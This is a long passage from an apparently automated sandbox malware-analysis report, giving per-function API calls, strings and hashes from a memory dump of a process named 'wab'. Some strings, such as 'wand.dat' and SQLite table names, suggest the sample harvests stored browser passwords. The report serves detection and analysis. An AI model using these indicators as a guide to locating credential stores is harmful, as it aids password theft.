                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                                                                      • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                                      • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                                                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                                                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                                                      • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1889144086-0
                                                                                                                                                                                                                      • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                      • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1661045500-0
                                                                                                                                                                                                                      • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                      • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0042EC7A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                                                      • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                                                      • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                      • API String ID: 1297977491-2063813899
                                                                                                                                                                                                                      • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                      • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                                                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                      • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                                      • API String ID: 2618321458-1828844352
                                                                                                                                                                                                                      • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                                                      • _wtoi.MSVCRT ref: 00410C80
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1549203181-0
                                                                                                                                                                                                                      • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                                      • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3550944819-0
                                                                                                                                                                                                                      • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3023356884-0
                                                                                                                                                                                                                      • Opcode ID: 04d2dee96b5e0c3aea304ed2264281ba89f9e94ec92aede7506340a7c7d04724
                                                                                                                                                                                                                      • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04d2dee96b5e0c3aea304ed2264281ba89f9e94ec92aede7506340a7c7d04724
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040B248
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3023356884-0
                                                                                                                                                                                                                      • Opcode ID: be216efb729f49d9b3453cff3a07ca29206f97cb50f4c40f8d3ab9401fa12aed
                                                                                                                                                                                                                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be216efb729f49d9b3453cff3a07ca29206f97cb50f4c40f8d3ab9401fa12aed
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1865533344-0
                                                                                                                                                                                                                      • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                                                      • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040B159
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1171893557-0
                                                                                                                                                                                                                      • Opcode ID: b35f5ae7fefd5d66d25ec59d6127a866c9c92b2d2e026b1e9a4331286ce66ec4
                                                                                                                                                                                                                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b35f5ae7fefd5d66d25ec59d6127a866c9c92b2d2e026b1e9a4331286ce66ec4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                        • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1127616056-0
                                                                                                                                                                                                                      • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: sqlite_master
                                                                                                                                                                                                                      • API String ID: 438689982-3163232059
                                                                                                                                                                                                                      • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                                      • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3917621476-0
                                                                                                                                                                                                                      • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                                                      • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 822687973-0
